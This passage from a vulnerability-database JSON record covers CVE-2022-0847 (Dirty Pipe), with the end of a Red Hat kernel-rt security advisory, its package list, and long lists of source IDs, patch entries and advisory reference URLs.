x86_64\nRed Hat Enterprise Linux for Real Time (v. 8) - x86_64\n\n3. Description:\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which enables\nfine-tuning for systems with extremely high determinism requirements. \n\nSecurity Fix(es):\n\n* kernel: improper initialization of the \"flags\" member of the new\npipe_buffer (CVE-2022-0847)\n\n* kernel: Use After Free in unix_gc() which could result in a local\nprivilege escalation (CVE-2021-0920)\n\n* kernel: local privilege escalation by exploiting the fsconfig syscall\nparameter leads to container breakout (CVE-2021-4154)\n\n* kernel: possible privileges escalation due to missing TLB flush\n(CVE-2022-0330)\n\n* kernel: remote stack overflow via kernel panic on systems using TIPC may\nlead to DoS (CVE-2022-0435)\n\n* kernel: cgroups v1 release_agent feature may allow privilege escalation\n(CVE-2022-0492)\n\n* kernel: failing usercopy allows for use-after-free exploitation\n(CVE-2022-22942)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nBug Fix(es):\n\n* kernel symbol \u0027__rt_mutex_init\u0027 is exported GPL-only in kernel\n4.18.0-348.2.1.rt7.132.el8_5 (BZ#2038423)\n\n* kernel-rt: update RT source tree to the RHEL-8.5.z3 source tree\n(BZ#2045589)\n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n2031930 - CVE-2021-0920 kernel: Use After Free in unix_gc() which could result in a local privilege escalation\n2034514 - CVE-2021-4154 kernel: local privilege escalation by exploiting the fsconfig syscall parameter leads to container breakout\n2042404 - CVE-2022-0330 kernel: possible privileges escalation due to missing TLB flush\n2044809 - CVE-2022-22942 kernel: failing usercopy allows for use-after-free exploitation\n2048738 - CVE-2022-0435 kernel: remote stack overflow via kernel panic on systems using TIPC may lead to DoS\n2051505 - CVE-2022-0492 kernel: cgroups v1 release_agent feature may allow privilege escalation\n2060795 - CVE-2022-0847 kernel: improper initialization of the \"flags\" member of the new pipe_buffer\n\n6. Package List:\n\nRed Hat Enterprise Linux Real Time for NFV (v. 8):\n\nSource:\nkernel-rt-4.18.0-348.20.1.rt7.150.el8_5.src.rpm\n\nx86_64:\nkernel-rt-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-core-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debug-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debug-core-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debug-debuginfo-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debug-devel-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debug-kvm-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debug-modules-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debug-modules-extra-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debuginfo-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debuginfo-common-x86_64-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-devel-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-kvm-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-modules-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-modules-extra-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\n\nRed Hat Enterprise Linux for Real Time (v. 8):\n\nSource:\nkernel-rt-4.18.0-348.20.1.rt7.150.el8_5.src.rpm\n\nx86_64:\nkernel-rt-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-core-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debug-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debug-core-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debug-debuginfo-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debug-devel-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debug-modules-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debug-modules-extra-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debuginfo-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-debuginfo-common-x86_64-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-devel-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-modules-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\nkernel-rt-modules-extra-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2022 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYippFNzjgjWX9erEAQhDwRAAjsGfW6qXFI81H8xov/wQnw/PdsUOhzDl\nISzJEeXALEQCloLH+UDcgo/wV1es00USfBo1H/SpDc5ahjBWP2pbo8QtIRKT6h/k\nord4KsAMGjqWRI+zaGbaFoL0q4okMG9H6r731TnhX06CaLXLui8iUJrQLziHo02t\n/AihF9dW30/w4tXyKeMc73D1lKHImQQFfJo5xpIo8Mm7+6GFrkne8Z46SKXjjyfG\nIODAcU3wA0C93bbtR4EHEbenVyVVaE5Phn40vxxF00+AQTHoc5nYpOJbDLI3bi1F\nGbEKQ5pf0jkScwlfEHtHkmjPk92PA/wV41BhPoJw8oKshH4RRxml4Ps0KldI4NrQ\nypmDLZ3CfJ+saFbNLN5BARCiqJavF5A4yszHZ5QuopmC1RJx6/rAuE79KkeB0JvW\nIOaXPzzc05dCqdyVBvNAu+XpVlTbe+XGBR0LalYYjYWxQSrEYAYQ005mcvEWOPRm\nQfPSM7eOaAzo9RGrMirTm0Gz9BJ0TbvNGiMmMTpLdb6akx1BQcQ5bpAjUCQN0O7j\nKIFri0FxflweqZswTchfdbW74VuUyTVaeFYKGhp5hFPV6lFkDUFEFC71ANvPaewE\nX1Z5Ae0gFMD8w5m5eePHqYuEaL6NHtYctHlBh0ef6mrvsKq9lmxJpdXrZUO+eP4w\nnEhPbkKSmMY=\n=CLN6\n-----END PGP SIGNATURE-----\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2022-0847"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-007117"
},
{
"db": "VULMON",
"id": "CVE-2022-0847"
},
{
"db": "PACKETSTORM",
"id": "169268"
},
{
"db": "PACKETSTORM",
"id": "166812"
},
{
"db": "PACKETSTORM",
"id": "166516"
},
{
"db": "PACKETSTORM",
"id": "166569"
},
{
"db": "PACKETSTORM",
"id": "166241"
},
{
"db": "PACKETSTORM",
"id": "166280"
},
{
"db": "PACKETSTORM",
"id": "166265"
},
{
"db": "PACKETSTORM",
"id": "166264"
}
],
"trust": 2.43
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2022-0847",
"trust": 4.1
},
{
"db": "PACKETSTORM",
"id": "166229",
"trust": 2.4
},
{
"db": "PACKETSTORM",
"id": "166258",
"trust": 2.4
},
{
"db": "PACKETSTORM",
"id": "166230",
"trust": 2.4
},
{
"db": "SIEMENS",
"id": "SSA-222547",
"trust": 1.6
},
{
"db": "ICS CERT",
"id": "ICSA-22-167-09",
"trust": 1.4
},
{
"db": "PACKETSTORM",
"id": "176534",
"trust": 1.0
},
{
"db": "JVN",
"id": "JVNVU99030761",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2022-007117",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "166812",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "166516",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "166569",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "166241",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "166280",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "166305",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022032843",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022031421",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022030808",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022042576",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022031308",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022031036",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.1027",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.0965",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.2981",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.1677",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.1405",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.1064",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.0944",
"trust": 0.6
},
{
"db": "CXSECURITY",
"id": "WLB-2022030042",
"trust": 0.6
},
{
"db": "CXSECURITY",
"id": "WLB-2022030060",
"trust": 0.6
},
{
"db": "EXPLOIT-DB",
"id": "50808",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202203-522",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2022-0847",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "169268",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "166265",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "166264",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2022-0847"
},
{
"db": "PACKETSTORM",
"id": "169268"
},
{
"db": "PACKETSTORM",
"id": "166812"
},
{
"db": "PACKETSTORM",
"id": "166516"
},
{
"db": "PACKETSTORM",
"id": "166569"
},
{
"db": "PACKETSTORM",
"id": "166241"
},
{
"db": "PACKETSTORM",
"id": "166280"
},
{
"db": "PACKETSTORM",
"id": "166265"
},
{
"db": "PACKETSTORM",
"id": "166264"
},
{
"db": "CNNVD",
"id": "CNNVD-202203-522"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-007117"
},
{
"db": "NVD",
"id": "CVE-2022-0847"
}
]
},
"id": "VAR-202203-0043",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.26739928
},
"last_update_date": "2026-04-10T21:54:57.588000Z",
"patch": {
"_id": null,
"data": [
{
"title": "Bug\u00a02060795",
"trust": 0.8,
"url": "https://fedoraproject.org/"
},
{
"title": "Linux kernel Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=184957"
},
{
"title": "Red Hat: Important: kernel-rt security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20220822 - Security Advisory"
},
{
"title": "Red Hat: Important: kernel security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20220831 - Security Advisory"
},
{
"title": "Red Hat: ",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=CVE-2022-0847"
},
{
"title": "Arch Linux Issues: ",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=CVE-2022-0847"
},
{
"title": "Dirty-Pipe-Oneshot",
"trust": 0.1,
"url": "https://github.com/badboy-sft/Dirty-Pipe-Oneshot "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2022-0847"
},
{
"db": "CNNVD",
"id": "CNNVD-202203-522"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-007117"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-665",
"trust": 1.0
},
{
"problemtype": "Improper initialization (CWE-665) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-007117"
},
{
"db": "NVD",
"id": "CVE-2022-0847"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 3.0,
"url": "http://packetstormsecurity.com/files/166258/dirty-pipe-local-privilege-escalation.html"
},
{
"trust": 3.0,
"url": "http://packetstormsecurity.com/files/166229/dirty-pipe-linux-privilege-escalation.html"
},
{
"trust": 2.4,
"url": "http://packetstormsecurity.com/files/166230/dirty-pipe-suid-binary-hijack-privilege-escalation.html"
},
{
"trust": 1.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0847"
},
{
"trust": 1.6,
"url": "https://dirtypipe.cm4all.com/"
},
{
"trust": 1.6,
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-222547.pdf"
},
{
"trust": 1.6,
"url": "https://psirt.global.sonicwall.com/vuln-detail/snwlid-2022-0015"
},
{
"trust": 1.6,
"url": "https://www.suse.com/support/kb/doc/?id=000020603"
},
{
"trust": 1.6,
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2060795"
},
{
"trust": 1.6,
"url": "https://security.netapp.com/advisory/ntap-20220325-0005/"
},
{
"trust": 1.1,
"url": "https://access.redhat.com/security/cve/cve-2022-0847"
},
{
"trust": 1.0,
"url": "http://packetstormsecurity.com/files/176534/linux-4.20-ktls-read-only-write.html"
},
{
"trust": 1.0,
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=cve-2022-0847"
},
{
"trust": 0.8,
"url": "https://jvn.jp/vu/jvnvu99030761/index.html"
},
{
"trust": 0.8,
"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-22-167-09"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/issue/wlb-2022030060"
},
{
"trust": 0.6,
"url": "https://www.exploit-db.com/exploits/50808"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/issue/wlb-2022030042"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/166305/red-hat-security-advisory-2022-0841-01.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022031308"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/166516/red-hat-security-advisory-2022-1083-01.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022032843"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/166241/ubuntu-security-notice-usn-5317-1.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.1405"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022031036"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/166280/red-hat-security-advisory-2022-0822-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.1027"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022030808"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.1064"
},
{
"trust": 0.6,
"url": "https://us-cert.cisa.gov/ics/advisories/icsa-22-167-09"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022042576"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/166569/ubuntu-security-notice-usn-5362-1.html"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/cveshow/cve-2022-0847/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/166812/red-hat-security-advisory-2022-1476-01.html"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/linux-kernel-file-write-via-dirty-pipe-37724"
},
{
"trust": 0.6,
"url": "https://source.android.com/security/bulletin/2022-05-01"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.0944"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.2981"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.0965"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022031421"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.1677"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0330"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0435"
},
{
"trust": 0.5,
"url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.5,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0516"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0492"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22942"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-0330"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-0920"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-22942"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-0920"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-0435"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-0492"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-4154"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-4154"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/vulnerabilities/rhsb-2022-002"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-0413"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-0536"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-25236"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-31566"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22822"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-22827"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-0392"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-22824"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-23219"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0235"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3999"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-23308"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-0516"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0392"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0261"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3999"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-31566"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-45960"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-46143"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-0361"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-23177"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-23852"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-0261"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0155"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-22826"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-23566"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-22825"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0318"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0359"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-0155"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-46143"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-0359"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0413"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-22822"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-23177"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-45960"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-0144"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-0318"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-23566"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-22823"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-0235"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0361"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-25315"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-23218"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0536"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-25235"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0144"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-23960"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-25636"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0001"
},
{
"trust": 0.1,
"url": "https://www.debian.org/security/faq"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-24448"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-25258"
},
{
"trust": 0.1,
"url": "https://www.debian.org/security/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-24959"
},
{
"trust": 0.1,
"url": "https://security-tracker.debian.org/tracker/linux"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-43976"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-25375"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-0778"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-41190"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.4/html/release_notes/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.4/html/release_notes/index"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0778"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-0811"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-27191"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.4/html-single/install/index#installing"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:1476"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-24778"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-41190"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-24450"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-43565"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0811"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-43565"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22825"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.3/html-single/install/index#installing"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.3/html/release_notes/index"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:1083"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22823"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22824"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.3/html/release_notes/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-4083"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0742"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-5362-1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-intel-5.13/5.13.0-1010.10"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-4155"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0185"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-42327"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-4090"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-23222"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-oracle-5.13/5.13.0-1021.26~20.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-azure/5.13.0-1017.19"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-hwe-5.13/5.13.0-35.40~20.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-aws/5.13.0-1017.19"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux/5.13.0-35.40"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-azure-5.13/5.13.0-1017.19~20.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-gcp-5.13/5.13.0-1019.23~20.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-raspi/5.13.0-1020.22"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-aws-5.13/5.13.0-1017.19~20.04.1"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0002"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.13.0-1019.23"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-5317-1"
},
{
"trust": 0.1,
"url": "https://wiki.ubuntu.com/securityteam/knowledgebase/bhi"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-oracle/5.13.0-1021.26"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-oem-5.14/5.14.0-1027.30"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-kvm/5.13.0-1016.17"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:0822"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:0831"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:0819"
}
],
"sources": [
{
"db": "PACKETSTORM",
"id": "169268"
},
{
"db": "PACKETSTORM",
"id": "166812"
},
{
"db": "PACKETSTORM",
"id": "166516"
},
{
"db": "PACKETSTORM",
"id": "166569"
},
{
"db": "PACKETSTORM",
"id": "166241"
},
{
"db": "PACKETSTORM",
"id": "166280"
},
{
"db": "PACKETSTORM",
"id": "166265"
},
{
"db": "PACKETSTORM",
"id": "166264"
},
{
"db": "CNNVD",
"id": "CNNVD-202203-522"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-007117"
},
{
"db": "NVD",
"id": "CVE-2022-0847"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULMON",
"id": "CVE-2022-0847",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "169268",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "166812",
"ident": null
},
{
